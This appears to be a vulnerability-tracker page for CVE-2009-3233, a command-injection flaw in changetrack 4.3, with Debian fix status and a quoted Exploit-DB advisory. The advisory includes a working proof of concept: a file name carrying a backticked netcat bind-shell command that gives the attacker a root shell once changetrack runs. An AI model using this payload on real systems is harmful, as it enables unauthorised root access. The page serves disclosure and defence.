CVE-2009-3233

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

changetrack 4.3 allows local users to execute arbitrary commands via CRLF sequences and shell metacharacters in a filename in a directory that is checked by changetrack.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-9709 local linux verified text · 1 KB

Rick · 2009-09-17

Changetrack 4.3-3 - Local Privilege Escalation

text exploit Source: Exploit-DB

TITLE:
Changetrack Privilege Escalation Vulnerability

SECUNIA ADVISORY ID:
SA36756

VERIFY ADVISORY:
http://secunia.com/advisories/36756/

DESCRIPTION:
A vulnerability has been discovered in Changetrack, which can be
exploited by malicious, local users to gain escalated privileges.

The application does not properly escape certain file names, which
can be exploited to inject and execute arbitrary shell commands
(potentially with "root" privileges) by creating a maliciously named
file in a directory tracked by Changetrack.

Successful exploitation requires write privileges to a directory
scanned by Changetrack.

SOLUTION:
Use Changetrack to track trusted directories only.

PROVIDED AND/OR DISCOVERED BY:
Marek Grzybowski


--------------------------------------------------------------------------------
Example of exploitation:

------------ Attacker ----------

rick@testmachine:~/testt$ touch "<\`nc -l -p 5001 -e \$SHELL\`"
rick@testmachine:~/testt$ ls
<`nc -l -p 5001 -e $SHELL`

--------------------------------


------------ root --------------

testmachine:~# changetrack 

------------ root --------------



------------ Attacker ----------

rick@testmachine:~/testt$ nc 127.0.0.1 5001
id
uid=0(root) gid=0(root) groups=0(root)

--------------------------------

# milw0rm.com [2009-09-17]

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`4.5-2`
sid	Fixed	`4.5-2`
forky	Fixed	`4.5-2`
bullseye	Fixed	`4.5-2`
bookworm	Fixed	`4.5-2`

References

https://security-tracker.debian.org/tracker/CVE-2009-3233

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.